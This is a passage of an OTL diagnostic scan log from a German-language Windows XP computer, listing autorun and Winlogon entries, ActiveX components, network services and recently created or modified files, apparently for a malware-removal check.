O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Programme\Gemeinsame Dateien\Skype\Skype4COM.dll (Skype Technologies)

O18 - Protocol\Handler\skype-ie-addon-data {91774881-D725-4E58-B298-07617B9B86A8} - C:\Programme\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)

O18 - Protocol\Handler\t-mobile - No CLSID value found

O18 - Protocol\Filter\text/xml {807563E5-5146-11D5-A672-00B0D022E945} - C:\Programme\Gemeinsame Dateien\Microsoft Shared\OFFICE12\MSOXMLMF.DLL (Microsoft Corporation)

O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)

O20 - HKLM Winlogon: UserInit - (C:\WINDOWS\system32\userinit.exe) - C:\WINDOWS\system32\userinit.exe (Microsoft Corporation)

O20 - Winlogon\Notify\ATFUS: DllName - (C:\WINDOWS\system32\FpWinLogonNp.dll) - C:\WINDOWS\system32\FpWinlogonNp.dll (AuthenTec,Inc)

O24 - Desktop Components:0 (Die derzeitige Homepage) - About:Home

O28 - HKLM ShellExecuteHooks: {5AE067D3-9AFB-48E0-853A-EBB7F4A000DA} - C:\Programme\SUPERAntiSpyware\SASSEH.DLL (SuperAdBlocker.com)

O32 - HKLM CDRom: AutoRun - 1

O32 - AutoRun File - [2012.03.24 10:48:56 | 000,000,000 | ---- | M] () - C:\AUTOEXEC.BAT -- [ NTFS ]

O32 - AutoRun File - [2012.08.21 18:20:53 | 000,000,100 | ---- | M] () - D:\AUTORUN.INF -- [ NTFS ]

O33 - MountPoints2\{43275983-7728-11e1-9c32-001eec0b78cd}\Shell - "" = AutoRun

O33 - MountPoints2\{43275983-7728-11e1-9c32-001eec0b78cd}\Shell\AutoRun - "" = Auto&Play

O33 - MountPoints2\{43275983-7728-11e1-9c32-001eec0b78cd}\Shell\AutoRun\command - "" = F:\OnSpcLCK.exe

O33 - MountPoints2\{9512a850-eb04-11e1-9c98-001eec0b78cd}\Shell - "" = AutoRun

O33 - MountPoints2\{9512a850-eb04-11e1-9c98-001eec0b78cd}\Shell\AutoRun - "" = Auto&Play

O33 - MountPoints2\{9512a850-eb04-11e1-9c98-001eec0b78cd}\Shell\AutoRun\command - "" = F:\AutoRun.exe

O34 - HKLM BootExecute: (autocheck autochk *)

O35 - HKLM\..comfile [open] -- "%1" %*

O35 - HKLM\..exefile [open] -- "%1" %*

O37 - HKLM\...com [@ = comfile] -- "%1" %*

O37 - HKLM\...exe [@ = exefile] -- "%1" %*

O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)

O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)

 

ActiveX: {08B0E5C0-4FCB-11CF-AAA5-00401C608500} - Java (Sun)

ActiveX: {10072CEC-8CC1-11D1-986E-00A0C955B42F} - Vektorgrafik-Rendering (VML)

ActiveX: {2179C5D3-EBFF-11CF-B6FD-00AA00B4E220} - NetShow

ActiveX: {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 6.4

ActiveX: {283807B5-2C60-11D0-A31D-00AA00B92C03} - DirectAnimation

ActiveX: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll

ActiveX: {36f8ec70-c29a-11d1-b5c7-0000f8051515} - Dynamic HTML-Datenbindung für Java

ActiveX: {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack

ActiveX: {3bf42070-b3b1-11d1-b5c5-0000f8051515} - Uniscribe

ActiveX: {4278c270-a269-11d1-b5bf-0000f8051515} - Erweitertes Authoring

ActiveX: {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles%\Outlook Express\setup50.exe" /APP:OE /CALLER:WINNT /user /install

ActiveX: {44BBA842-CC51-11CF-AAFA-00AA00B6015B} - rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msnetmtg.inf,NetMtg.Install.PerUser.NT

ActiveX: {44BBA848-CC51-11CF-AAFA-00AA00B6015C} - DirectShow

ActiveX: {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx

ActiveX: {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help

ActiveX: {4f216970-c90c-11d1-b5c7-0000f8051515} - DirectAnimation Java Classes

ActiveX: {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6

ActiveX: {5056b317-8d4c-43ee-8543-b9d1e234b8f4} - Sicherheitsupdate für Windows XP (KB923789)

ActiveX: {5945c046-1e7d-11d1-bc44-00c04fd912be} - rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msmsgs.inf,BLC.QuietInstall.PerUser

ActiveX: {5A8D6EE0-3E18-11D0-821E-444553540000} - ICW

ActiveX: {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools

ActiveX: {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements

ActiveX: {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player

ActiveX: {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access

ActiveX: {73fa19d0-2d75-11d2-995d-00c04f98bbc9} - Web Folders

ActiveX: {7790769C-0471-11d2-AF11-00C04FA35D02} - "%ProgramFiles%\Outlook Express\setup50.exe" /APP:WAB /CALLER:WINNT /user /install

ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll

ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\WINDOWS\system32\ie4uinit.exe -BaseSettings

ActiveX: {89B4C1CD-B018-4511-B0A1-5476DBF70820} - c:\WINDOWS\system32\Rundll32.exe c:\WINDOWS\system32\mscories.dll,Install

ActiveX: {9309DD7E-EBFE-3C95-8B47-30D3A012F606} - .NET Framework

ActiveX: {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding

ActiveX: {B508B3F1-A24A-32C0-B310-85786919EF28} - .NET Framework

ActiveX: {C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F} - .NET Framework

ActiveX: {C3C986D6-06B1-43BF-90DD-BE30756C00DE} - RevokedRootsUpdate

ActiveX: {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts

ActiveX: {CC2A9BA0-3BDD-11D0-821E-444553540000} - Taskplaner

ActiveX: {CDD7975E-60F8-41d5-8149-19E51D6F71D0} - Windows Movie Maker v2.1

ActiveX: {D27CDB6E-AE6D-11cf-96B8-444553540000} - Macromedia Shockwave Flash

ActiveX: {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help

ActiveX: {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface

ActiveX: <{12d0ed0d-0ee0-4f90-8827-78cefb8f4988} - C:\WINDOWS\system32\ieudinit.exe

ActiveX: >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - C:\WINDOWS\inf\unregmp2.exe /HideWMP

ActiveX: >{26923b43-4d38-484f-9b9e-de460746276c} - C:\WINDOWS\system32\ie4uinit.exe -UserIconConfig

ActiveX: >{60B49E34-C7CC-11D0-8953-00A0C90347FF} - "C:\WINDOWS\system32\rundll32.exe" "C:\WINDOWS\system32\iedkcs32.dll",BrandIEActiveSetup SIGNUP

ActiveX: >{60B49E34-C7CC-11D0-8953-00A0C90347FF}MICROS - RunDLL32 IEDKCS32.DLL,BrandIE4 SIGNUP

ActiveX: >{881dd1c5-3dcf-431b-b061-f3f88e8be88a} - %systemroot%\system32\shmgrate.exe OCInstallUserConfigOE

 

NetSvcs: 6to4 -  File not found

NetSvcs: Ias -  File not found

NetSvcs: Iprip -  File not found

NetSvcs: Irmon -  File not found

NetSvcs: NWCWorkstation -  File not found

NetSvcs: Nwsapagent -  File not found

NetSvcs: UxTuneUp - C:\WINDOWS\system32\uxtuneup.dll (TuneUp Software)

NetSvcs: WmdmPmSp -  File not found

 

 

CREATERESTOREPOINT

Restore point Set: OTL Restore Point

 
 ========== Files/Folders - Created Within 30 Days ==========

 

[2012.09.12 10:51:31 | 000,040,776 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbamswissarmy.sys

[2012.09.12 10:50:46 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\Admin\Anwendungsdaten\Mozilla

[2012.09.11 23:48:27 | 000,000,000 | -HSD | C] -- C:\Config.Msi

[2012.09.11 23:18:32 | 000,029,024 | ---- | C] (TuneUp Software) -- C:\WINDOWS\System32\uxtuneup.dll

[2012.09.11 16:50:53 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\Admin\Desktop\arge

[2012.09.10 09:23:49 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\Admin\Desktop\Firefox_Potable

[2012.09.09 23:24:49 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\Admin\Anwendungsdaten\SUPERAntiSpyware.com

[2012.09.09 23:23:42 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\SUPERAntiSpyware.com

[2012.09.09 23:23:42 | 000,000,000 | ---D | C] -- C:\Programme\SUPERAntiSpyware

[2012.09.09 22:34:27 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\Admin\Anwendungsdaten\Malwarebytes

[2012.09.09 22:33:37 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Malwarebytes' Anti-Malware

[2012.09.09 22:33:36 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Malwarebytes

[2012.09.09 22:33:33 | 000,022,856 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbam.sys

[2012.09.09 22:33:32 | 000,000,000 | ---D | C] -- C:\Programme\Malwarebytes' Anti-Malware

[2012.09.07 12:47:32 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\Admin\Desktop\joomla-1.5.26

[2012.09.06 16:12:11 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\SupportAppCB

[2012.09.05 16:06:24 | 000,737,280 | ---- | C] (Indigo Rose Corporation) -- C:\WINDOWS\iun6002.exe

[2012.09.05 16:05:29 | 000,536,661 | ---- | C] (Stardock.Net, Inc) -- C:\WINDOWS\System32\wbocx.ocx

[2012.09.05 16:05:15 | 000,000,000 | ---D | C] -- C:\Programme\OptionHSDPA

[2012.09.05 16:05:04 | 000,000,000 | ---D | C] -- C:\Programme\OptionPCCards

[2012.09.05 16:03:57 | 000,000,000 | ---D | C] -- C:\Programme\Gemeinsame Dateien\SWF Studio

[2012.09.04 13:54:20 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\Admin\Lokale Einstellungen\Anwendungsdaten\Mozilla

[2012.08.22 13:49:37 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Check Point

[2012.08.20 22:51:44 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\Admin\Eigene Dateien\iMacros

[2012.08.20 22:22:52 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Mobile Partner

[2012.08.20 22:22:48 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Mobile Partner

[2012.08.20 22:22:12 | 000,085,248 | ---- | C] (Huawei Technologies Co., Ltd.) -- C:\WINDOWS\System32\drivers\ew_jucdcacm.sys

[2012.08.20 22:22:12 | 000,072,576 | ---- | C] (Huawei Technologies Co., Ltd.) -- C:\WINDOWS\System32\drivers\ew_jubusenum.sys

[2012.08.20 22:22:12 | 000,051,456 | ---- | C] (Huawei Technologies Co., Ltd.) -- C:\WINDOWS\System32\drivers\ew_jucdcecm.sys

[2012.08.20 22:22:12 | 000,026,496 | ---- | C] (Huawei Technologies Co., Ltd.) -- C:\WINDOWS\System32\drivers\ew_juextctrl.sys

[2012.08.20 22:22:11 | 000,860,928 | ---- | C] (DiBcom SA) -- C:\WINDOWS\System32\drivers\mod7700.sys

[2012.08.20 22:22:11 | 000,117,504 | ---- | C] (Huawei Technologies Co., Ltd.) -- C:\WINDOWS\System32\drivers\ewusbnet.sys

[2012.08.20 22:22:11 | 000,106,496 | ---- | C] (Huawei Technologies Co., Ltd.) -- C:\WINDOWS\System32\drivers\ewusbmdm.sys

[2012.08.20 22:22:11 | 000,024,448 | ---- | C] (Huawei Tech. Co., Ltd.) -- C:\WINDOWS\System32\drivers\ewdcsc.sys

[2012.08.20 22:22:11 | 000,011,136 | ---- | C] (Huawei Technologies Co., Ltd.) -- C:\WINDOWS\System32\drivers\ew_usbenumfilter.sys

[2012.08.20 22:22:10 | 000,102,784 | ---- | C] (Huawei Technologies Co., Ltd.) -- C:\WINDOWS\System32\drivers\ew_hwusbdev.sys

[2012.08.20 22:21:39 | 000,000,000 | ---D | C] -- C:\Programme\Mobile Partner

[2012.08.20 22:21:21 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\DatacardService

[4 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]

[4 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]

[1 C:\WINDOWS\System32\drivers\*.tmp files -> C:\WINDOWS\System32\drivers\*.tmp -> ]

 
 ========== Files - Modified Within 30 Days ==========

 

[2012.09.12 15:30:02 | 000,000,884 | ---- | M] () -- C:\WINDOWS\tasks\Adobe Flash Player Updater.job

[2012.09.12 15:25:00 | 000,000,494 | ---- | M] () -- C:\WINDOWS\tasks\SUPERAntiSpyware Scheduled Task 4884a6f4-c9f2-4499-8108-a3d71c7f3019.job

[2012.09.12 14:10:32 | 000,000,356 | -H-- | M] () -- C:\WINDOWS\tasks\avast! Emergency Update.job

[2012.09.12 14:09:23 | 000,013,646 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl

[2012.09.12 14:08:33 | 000,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat

[2012.09.12 10:51:31 | 000,040,776 | ---- | M] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbamswissarmy.sys

[2012.09.11 23:46:43 | 000,453,056 | ---- | M] () -- C:\WINDOWS\System32\perfh007.dat

[2012.09.11 23:46:43 | 000,436,096 | ---- | M] () -- C:\WINDOWS\System32\perfh009.dat

[2012.09.11 23:46:43 | 000,082,012 | ---- | M] () -- C:\WINDOWS\System32\perfc007.dat

[2012.09.11 23:46:43 | 000,068,992 | ---- | M] () -- C:\WINDOWS\System32\perfc009.dat

[2012.09.11 16:55:49 | 000,000,428 | ---- | M] () -- C:\WINDOWS\EasyCT.INI

[2012.09.11 10:25:30 | 000,004,608 | ---- | M] () -- C:\Dokumente und Einstellungen\Admin\Lokale Einstellungen\Anwendungsdaten\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini

[2012.09.10 10:47:29 | 000,002,243 | ---- | M] () -- C:\Dokumente und Einstellungen\All Users\Desktop\Skype.lnk

[2012.09.09 23:25:16 | 000,000,494 | ---- | M] () -- C:\WINDOWS\tasks\SUPERAntiSpyware Scheduled Task 3c470f09-6a31-4896-8a7c-955648767612.job

[2012.09.09 23:23:56 | 000,001,642 | ---- | M] () -- C:\Dokumente und Einstellungen\All Users\Desktop\SUPERAntiSpyware Free Edition.lnk

[2012.09.09 22:33:37 | 000,000,756 | ---- | M] () -- C:\Dokumente und Einstellungen\All Users\Desktop\Malwarebytes Anti-Malware.lnk

[2012.09.07 17:04:46 | 000,022,856 | ---- | M] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbam.sys

[2012.09.05 17:14:42 | 000,000,057 | ---- | M] () -- C:\WINDOWS\init.ini

[2012.09.05 16:06:09 | 000,737,280 | ---- | M] (Indigo Rose Corporation) -- C:\WINDOWS\iun6002.exe

[2012.09.05 16:05:21 | 000,065,973 | ---- | M] () -- C:\WINDOWS\sem_GCXXUninstall.exe

[2012.09.05 16:05:18 | 000,089,716 | ---- | M] () -- C:\WINDOWS\OptionPluss_PCCardInstallerUninstall.exe

[2012.09.05 16:05:14 | 000,090,499 | ---- | M] () -- C:\WINDOWS\OptionPCCardInstallerUninstall.exe

[2012.08.25 10:32:45 | 000,217,656 | ---- | M] () -- C:\WINDOWS\System32\FNTCACHE.DAT

[2012.08.24 12:33:33 | 000,001,374 | ---- | M] () -- C:\WINDOWS\imsins.BAK

[2012.08.22 14:00:40 | 000,003,001 | ---- | M] () -- C:\WINDOWS\System32\CONFIG.NT

[2012.08.22 14:00:02 | 000,415,933 | ---- | M] () -- C:\WINDOWS\System32\vsconfig.xml

[2012.08.21 11:13:15 | 000,729,752 | ---- | M] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswSnx.sys

[2012.08.21 11:13:15 | 000,355,632 | ---- | M] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswSP.sys

[2012.08.21 11:13:15 | 000,054,232 | ---- | M] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswTdi.sys

[2012.08.21 11:13:14 | 000,097,608 | ---- | M] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswmon2.sys

[2012.08.21 11:13:14 | 000,089,624 | ---- | M] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswmon.sys

[2012.08.21 11:13:14 | 000,035,928 | ---- | M] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswRdr.sys

[2012.08.21 11:13:13 | 000,025,256 | ---- | M] (AVAST Software) -- C:\WINDOWS\System32\drivers\aavmker4.sys

[2012.08.21 11:13:13 | 000,021,256 | ---- | M] (AVAST Software) -- C:\WINDOWS\System32\drivers\aswFsBlk.sys

[2012.08.21 11:12:33 | 000,041,224 | ---- | M] (AVAST Software) -- C:\WINDOWS\avastSS.scr

[2012.08.21 11:12:23 | 000,227,648 | ---- | M] (AVAST Software) -- C:\WINDOWS\System32\aswBoot.exe

[2012.08.20 22:22:52 | 000,000,726 | ---- | M] () -- C:\Dokumente und Einstellungen\All Users\Desktop\Mobile Partner.lnk

[2012.08.20 22:22:32 | 000,000,000 | -H-- | M] () -- C:\WINDOWS\System32\drivers\Msft_Kernel_ew_jubusenum_01007.Wdf

[2012.08.20 22:22:31 | 000,000,000 | -H-- | M] () -- C:\WINDOWS\System32\drivers\MsftWdf_Kernel_01007_Coinstaller_Critical.Wdf

[2012.08.20 22:21:52 | 000,860,928 | ---- | M] (DiBcom SA) -- C:\WINDOWS\System32\drivers\mod7700.sys

[2012.08.20 22:21:52 | 000,051,456 | ---- | M] (Huawei Technologies Co., Ltd.) -- C:\WINDOWS\System32\drivers\ew_jucdcecm.sys

[2012.08.20 22:21:52 | 000,026,496 | ---- | M] (Huawei Technologies Co., Ltd.) -- C:\WINDOWS\System32\drivers\ew_juextctrl.sys

[2012.08.20 22:21:52 | 000,011,136 | ---- | M] (Huawei Technologies Co., Ltd.) -- C:\WINDOWS\System32\drivers\ew_usbenumfilter.sys

[2012.08.20 22:21:51 | 000,117,504 | ---- | M] (Huawei Technologies Co., Ltd.) -- C:\WINDOWS\System32\drivers\ewusbnet.sys

[2012.08.20 22:21:51 | 000,106,496 | ---- | M] (Huawei Technologies Co., Ltd.) -- C:\WINDOWS\System32\drivers\ewusbmdm.sys

[2012.08.20 22:21:51 | 000,102,784 | ---- | M] (Huawei Technologies Co., Ltd.) -- C:\WINDOWS\System32\drivers\ew_hwusbdev.sys

[2012.08.20 22:21:51 | 000,085,248 | ---- | M] (Huawei Technologies Co., Ltd.) -- C:\WINDOWS\System32\drivers\ew_jucdcacm.sys

[2012.08.20 22:21:51 | 000,072,576 | ---- | M] (Huawei Technologies Co., Ltd.) -- C:\WINDOWS\System32\drivers\ew_jubusenum.sys

[2012.08.20 22:21:51 | 000,024,448 | ---- | M] (Huawei Tech. Co., Ltd.) -- C:\WINDOWS\System32\drivers\ewdcsc.sys

[4 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]

[4 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]

[1 C:\WINDOWS\System32\drivers\*.tmp files -> C:\WINDOWS\System32\drivers\*.tmp -> ]

 
 ========== Files Created - No Company Name ==========

 

[2012.09.11 23:46:38 | 000,000,783 | ---- | C] () -- C:\Dokumente und Einstellungen\Admin\Startmenü\Programme\Internet Explorer.lnk

[2012.09.11 10:25:29 | 000,004,608 | ---- | C] () -- C:\Dokumente und Einstellungen\Admin\Lokale Einstellungen\Anwendungsdaten\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini

[2012.09.09 23:25:18 | 000,000,494 | ---- | C] () -- C:\WINDOWS\tasks\SUPERAntiSpyware Scheduled Task 4884a6f4-c9f2-4499-8108-a3d71c7f3019.job

[2012.09.09 23:25:15 | 000,000,494 | ---- | C] () -- C:\WINDOWS\tasks\SUPERAntiSpyware Scheduled Task 3c470f09-6a31-4896-8a7c-955648767612.job

[2012.09.09 23:23:56 | 000,001,642 | ---- | C] () -- C:\Dokumente und Einstellungen\All Users\Desktop\SUPERAntiSpyware Free Edition.lnk

[2012.09.09 22:44:16 | 000,032,768 | ---- | C] () -- C:\WINDOWS\System32\drivers\sp_rsdrv2.sys

[2012.09.09 22:33:37 | 000,000,756 | ---- | C] () -- C:\Dokumente und Einstellungen\All Users\Desktop\Malwarebytes Anti-Malware.lnk

[2012.09.06 16:16:12 | 000,000,622 | ---- | C] () -- C:\NetworkCfg.xml

[2012.09.05 16:05:42 | 000,000,057 | ---- | C] () -- C:\WINDOWS\init.ini

[2012.09.05 16:05:21 | 000,065,973 | ---- | C] () -- C:\WINDOWS\sem_GCXXUninstall.exe

[2012.09.05 16:05:18 | 000,089,716 | ---- | C] () -- C:\WINDOWS\OptionPluss_PCCardInstallerUninstall.exe

[2012.09.05 16:05:14 | 000,090,499 | ---- | C] () -- C:\WINDOWS\OptionPCCardInstallerUninstall.exe

[2012.08.22 14:00:39 | 000,000,356 | -H-- | C] () -- C:\WINDOWS\tasks\avast! Emergency Update.job

[2012.08.20 22:22:52 | 000,000,726 | ---- | C] () -- C:\Dokumente und Einstellungen\All Users\Desktop\Mobile Partner.lnk

[2012.08.20 22:22:32 | 000,000,000 | -H-- | C] () -- C:\WINDOWS\System32\drivers\Msft_Kernel_ew_jubusenum_01007.Wdf

[2012.08.20 22:22:31 | 000,000,000 | -H-- | C] () -- C:\WINDOWS\System32\drivers\MsftWdf_Kernel_01007_Coinstaller_Critical.Wdf

[2012.03.28 09:52:30 | 000,003,072 | ---- | C] () -- C:\WINDOWS\System32\iacenc.dll

[2012.03.26 12:17:13 | 000,008,704 | ---- | C] () -- C:\WINDOWS\System32\CNMVS50.DLL

[2012.03.25 10:56:12 | 000,000,428 | ---- | C] () -- C:\WINDOWS\EasyCT.INI

[2012.03.24 12:01:27 | 000,319,488 | ---- | C] () -- C:\WINDOWS\System32\AegisI5Installer.exe

[2012.03.24 11:58:38 | 000,016,480 | ---- | C] () -- C:\WINDOWS\System32\rixdicon.dll

[2012.03.24 11:53:45 | 000,086,016 | ---- | C] () -- C:\WINDOWS\System32\preflib.dll

[2012.03.24 11:53:44 | 000,757,760 | ---- | C] () -- C:\WINDOWS\System32\bcm1xsup.dll

[2012.03.24 11:53:44 | 000,020,480 | ---- | C] () -- C:\WINDOWS\System32\WLTRYSVC.EXE

[2012.03.24 11:40:31 | 000,000,176 | ---- | C] () -- C:\WINDOWS\System32\drivers\RTHDAEQ0.dat

[2012.03.24 11:40:30 | 000,049,152 | ---- | C] () -- C:\WINDOWS\System32\ChCfg.exe

[2012.03.24 10:50:49 | 000,002,048 | --S- | C] () -- C:\WINDOWS\bootstat.dat

[2012.03.24 10:38:22 | 000,021,740 | ---- | C] () -- C:\WINDOWS\System32\emptyregdb.dat

[2012.03.24 10:26:57 | 000,004,161 | ---- | C] () -- C:\WINDOWS\ODBCINST.INI

[2012.03.24 10:25:39 | 000,217,656 | ---- | C] () -- C:\WINDOWS\System32\FNTCACHE.DAT

 
 ========== LOP Check ==========

 

[2012.05.28 11:35:00 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\Admin\Anwendungsdaten\Canon

[2012.08.22 14:19:41 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\Admin\Anwendungsdaten\CheckPoint

[2012.03.25 10:27:26 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\Admin\Anwendungsdaten\HeidiSQL

[2012.04.07 11:19:21 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\Admin\Anwendungsdaten\MySEOSolution_DB_Dir

[2012.03.26 09:06:25 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\Admin\Anwendungsdaten\Notepad++

[2012.03.26 10:20:47 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\Admin\Anwendungsdaten\OpenOffice.org

[2012.04.03 09:29:17 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\Admin\Anwendungsdaten\Oracle

[2012.03.26 14:22:05 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\Admin\Anwendungsdaten\SharePod

[2012.03.26 09:14:38 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\Admin\Anwendungsdaten\StumbleUpon

[2012.03.26 12:54:33 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\Admin\Anwendungsdaten\TuneUp Software

[2012.09.08 11:21:27 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\Admin\Anwendungsdaten\VoipStunt

[2012.03.24 13:08:00 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\AVAST Software

[2012.03.26 12:17:23 | 000,000,000 | -H-D | M] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\CanonBJ

[2012.03.24 13:22:37 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\CheckPoint

[2012.08.11 07:52:18 | 000,000,000 | -H-D | M] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Common Files

[2012.08.20 22:23:58 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\DatacardService

[2012.03.25 10:53:30 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Easy CD-DA Extractor

[2012.05.03 14:01:59 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\EasyCash&Tax

[2012.08.20 22:23:01 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Mobile Partner

[2012.03.25 10:53:29 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\TEMP

[2012.03.25 11:51:31 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\TuneUp Software

[2012.03.25 11:50:12 | 000,000,000 | -HSD | M] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\{32364CEA-7855-4A3C-B674-53D8E9B97936}

[2012.09.12 14:10:32 | 000,000,356 | -H-- | M] () -- C:\WINDOWS\Tasks\avast! Emergency Update.job

[2012.09.09 23:25:16 | 000,000,494 | ---- | M] () -- C:\WINDOWS\Tasks\SUPERAntiSpyware Scheduled Task 3c470f09-6a31-4896-8a7c-955648767612.job

[2012.09.12 15:25:00 | 000,000,494 | ---- | M] () -- C:\WINDOWS\Tasks\SUPERAntiSpyware Scheduled Task 4884a6f4-c9f2-4499-8108-a3d71c7f3019.job

 
 ========== Purity Check ==========

 

 

 
 ========== Custom Scans ==========

 
 < %SYSTEMDRIVE%\*. >

[2012.03.31 08:43:29 | 000,000,000 | ---D | M] -- C:\69372863ad9470103ee4

[2012.03.26 12:27:28 | 000,000,000 | -H-D | M] -- C:\CanoScan

[2012.09.12 00:16:40 | 000,000,000 | -HSD | M] -- C:\Config.Msi

[2012.09.06 10:50:32 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen

[2012.03.24 11:26:19 | 000,000,000 | ---D | M] -- C:\DRIVERS

[2012.03.24 11:43:01 | 000,000,000 | ---D | M] -- C:\Intel

[2012.03.24 12:50:58 | 000,000,000 | RH-D | M] -- C:\MSOCache

[2012.09.11 23:27:14 | 000,000,000 | R--D | M] -- C:\Programme

[2012.03.24 11:04:50 | 000,000,000 | -HSD | M] -- C:\RECYCLER

[2012.09.10 21:53:30 | 000,000,000 | -HSD | M] -- C:\System Volume Information

[2012.09.12 14:08:46 | 000,000,000 | ---D | M] -- C:\WINDOWS

 
 < %PROGRAMFILES%\*.exe >

Invalid Environment Variable: LOCALAPPDATA

 
 < %systemroot%\*. /mp /s >

 
 < C:\Windows\system32\*.tsp >

[2008.04.14 04:23:08 | 000,266,240 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\h323.tsp

[2008.04.14 04:23:08 | 000,029,696 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\hidphone.tsp

[2008.04.14 04:23:08 | 000,017,408 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\ipconf.tsp

[2008.04.14 04:23:08 | 000,033,280 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\kmddsp.tsp

[2008.04.14 04:23:08 | 000,057,344 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\ndptsp.tsp

[2008.04.14 04:23:08 | 000,076,800 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\remotesp.tsp

